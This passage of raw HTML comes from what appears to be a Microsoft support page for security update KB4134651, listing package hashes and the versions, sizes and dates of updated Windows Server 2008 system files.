class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Windows6.0-KB4134651-ia64.msu</td><td>FCFD12B7D19CCEF827F086FB3D5BCD961723363E</td><td>3E8EC96351AA00649BB98A8A72C5E8AEAE5EBC4E9E3E62A8E7D447F7C039D075</td></tr><tr><td>Windows6.0-KB4134651-x86.msu</td><td>C3102BEDCA9F6D9C1EA29732F8B2D832355E01E9</td><td>C307567AEFACA32665DF458BEE9A10D5541D03644CAF8A3C0C636184EAB4A751</td></tr><tr><td>Windows6.0-KB4134651-x64.msu</td><td>55BD8538E452DB8FD330A88666E13151F5DE8334</td><td>14F8A210905C5F2CB1712F2C7E61F45294879E9661CDCE7BDCDA64D48DD5197A</td></tr><tr><td>WindowsXP-KB4134651-x86-Embedded-ENU.exe</td><td>BA2C6637491967E459B9F24B9939618DBCDC8978</td><td>7BD6C9443E70DE7FBB66E83B38032A0222E94E1AADDC6056D135C2C4FEBB77FE</td></tr></tbody></table></td></tr></tbody></table><p><br/><strong>File information</strong><br/><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td><td><strong class=\"sbody-strong\">Service branch</strong></td></tr><tr><td>Hal.dll</td><td>6.0.6002.24367</td><td>428,224</td><td>28-Apr-2018</td><td>02:42</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>373,760</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>255,488</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,536</td><td>28-Apr-2018</td><td>04:33</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>352,768</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>349,696</td><td>28-Apr-2018</td><td>04:11</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>346,624</td><td>28-Apr-2018</td><td>04:17</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>338,944</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>1,980,416</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Setbcdlocale.dll</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,980,096</td><td>28-Apr-2018</td><td>02:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>27,136</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,112</td><td>28-Apr-2018</td><td>02:25</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>26,624</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:20</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,600</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:15</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi.mui</td><td>6.0.6002.24367</td><td>25,088</td><td>28-Apr-2018</td><td>04:28</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Winload.efi</td><td>6.0.6002.24367</td><td>1,980,096</td><td>28-Apr-2018</td><td>02:42</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:03</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,216</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll.mui</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>04:23</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ci.dll</td><td>6.0.6002.24259</td><td>215,784</td><td>15-Dec-2017</td><td>14:06</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Driver.stl</td><td>Not applicable</td><td>4,349</td><td>15-Dec-2017</td><td>14:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>4,194,304</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Rpcss.dll</td><td>6.0.6002.24367</td><td>1,220,096</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>02:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,064</td><td>28-Apr-2018</td><td>04:31</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:20</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>13,824</td><td>28-Apr-2018</td><td>04:21</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>12,800</td><td>28-Apr-2018</td><td>04:09</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:16</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,072</td><td>28-Apr-2018</td><td>04:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>9,728</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>02:00</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Csrsrv.dll</td><td>6.0.6002.24367</td><td>150,016</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>2,193,920</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>250,880</td><td>28-Apr-2018</td><td>04:02</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>04:04</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>160,256</td><td>28-Apr-2018</td><td>04:05</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>71,680</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>224,256</td><td>28-Apr-2018</td><td>02:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>02:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:22</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>281,600</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>23,040</td><td>28-Apr-2018</td><td>04:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>181,248</td><td>28-Apr-2018</td><td>04:32</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>67,584</td><td>28-Apr-2018</td><td>04:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>158,720</td><td>28-Apr-2018</td><td>04:23</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>16,384</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,080</td><td>28-Apr-2018</td><td>04:24</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>42,496</td><td>28-Apr-2018</td><td>04:22</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>143,360</td><td>28-Apr-2018</td><td>04:08</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>15,360</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>101,376</td><td>28-Apr-2018</td><td>04:10</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>04:06</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>121,344</td><td>28-Apr-2018</td><td>04:14</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:16</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>87,040</td><td>28-Apr-2018</td><td>04:17</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>04:12</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>126,976</td><td>28-Apr-2018</td><td>04:27</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>13,312</td><td>28-Apr-2018</td><td>04:29</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>89,600</td><td>28-Apr-2018</td><td>04:30</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>35,840</td><td>28-Apr-2018</td><td>04:26</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:51</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>121,856</td><td>28-Apr-2018</td><td>01:57</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>2,552,496</td><td>28-Apr-2018</td><td>02:32</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>2,025,984</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ntoskrnl.exe</td><td>6.0.6002.24367</td><td>9,427,648</td><td>28-Apr-2018</td><td>02:42</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>3,289,088</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Spsys.sys</td><td>6.0.6002.24298</td><td>702,464</td><td>23-Feb-2018</td><td>03:26</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Smss.exe</td><td>6.0.6002.24367</td><td>159,744</td><td>28-Apr-2018</td><td>01:52</td><td>IA-64</td><td>Not applicable</td></tr><tr><td>Ia32exec.bin</td><td>6.5.6524.0</td><td>8,262,048</td><td>21-Nov-2017</td><td>04:34</td><td>Not applicable</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>27,648</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64.dll</td><td>6.0.6002.24367</td><td>523,776</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64cpu.dll</td><td>6.0.6002.24367</td><td>43,008</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow64win.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wowia32x.dll</td><td>6.5.6563.0</td><td>88,576</td><td>28-Apr-2018</td><td>02:23</td><td>IA-64</td><td>IA64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Comcat.dll</td><td>6.0.6002.24367</td><td>7,168</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleres.dll</td><td>6.0.6002.24367</td><td>23,552</td><td>28-Apr-2018</td><td>01:44</td><td>x86</td><td>Not applicable</td></tr><tr><td>Kernel32.dll</td><td>6.0.6002.24367</td><td>862,720</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ntdll.dll</td><td>6.0.6002.24367</td><td>1,168,840</td><td>28-Apr-2018</td><td>02:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Oleaut32.dll</td><td>6.0.6002.24367</td><td>574,464</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Rpcrt4.dll</td><td>6.0.6002.24367</td><td>679,424</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Acwow64.dll</td><td>6.0.6002.24367</td><td>43,520</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Instnm.exe</td><td>6.0.6002.24367</td><td>7,680</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Ntvdm64.dll</td><td>6.0.6002.24367</td><td>14,336</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Setup16.exe</td><td>3.1.0.1918</td><td>26,112</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>User.exe</td><td>6.0.6002.24367</td><td>2,560</td><td>28-Apr-2018</td><td>01:41</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Wow32.dll</td><td>6.0.6002.24367</td><td>5,120</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>WOW64_MICROSOFT-WINDOWS-WOW</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>385,024</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>266,240</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>393,216</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:59</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>360,448</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>356,352</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll.mui</td><td>6.0.6002.24367</td><td>348,160</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Advapi32.dll</td><td>6.0.6002.24367</td><td>823,808</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Ole32.dll</td><td>6.0.6002.24367</td><td>1,321,472</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>X86_MICROSOFT-WINDOWS-COM-BASE-QFE</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:43</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:44</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>02:36</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:37</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:47</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:53</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Ole32.dll.mui</td><td>6.0.6002.24367</td><td>3,584</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Oleres.dll.mui</td><td>6.0.6002.24367</td><td>20,480</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>262,144</td><td>28-Apr-2018</td><td>03:48</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>81,920</td><td>28-Apr-2018</td><td>03:46</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>233,472</td><td>28-Apr-2018</td><td>02:40</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>28,672</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>155,648</td><td>28-Apr-2018</td><td>02:41</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>69,632</td><td>28-Apr-2018</td><td>02:39</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>290,816</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>32,768</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>192,512</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>77,824</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>167,936</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>118,784</td><td>28-Apr-2018</td><td>03:58</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>151,552</td><td>28-Apr-2018</td><td>03:50</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>110,592</td><td>28-Apr-2018</td><td>03:51</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>53,248</td><td>28-Apr-2018</td><td>03:49</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>131,072</td><td>28-Apr-2018</td><td>03:56</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:57</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>40,960</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll.mui</td><td>6.0.6002.24367</td><td>135,168</td><td>28-Apr-2018</td><td>03:54</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Auditpol.exe.mui</td><td>6.0.6002.24367</td><td>24,576</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msaudite.dll.mui</td><td>6.0.6002.24367</td><td>98,304</td><td>28-Apr-2018</td><td>03:55</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Msobjs.dll.mui</td><td>6.0.6002.24367</td><td>45,056</td><td>28-Apr-2018</td><td>03:52</td><td>Not applicable</td><td>Not applicable</td></tr><tr><td>Adtschema.dll</td><td>6.0.6002.24367</td><td>620,544</td><td>28-Apr-2018</td><td>01:40</td><td>x86</td><td>Not applicable</td></tr><tr><td>Auditpol.exe</td><td>6.0.6002.24367</td><td>41,984</td><td>28-Apr-2018</td><td>01:43</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msaudite.dll</td><td>6.0.6002.24367</td><td>146,432</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr><tr><td>Msobjs.dll</td><td>6.0.6002.24367</td><td>58,880</td><td>28-Apr-2018</td><td>02:37</td><td>x86</td><td>Not applicable</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td 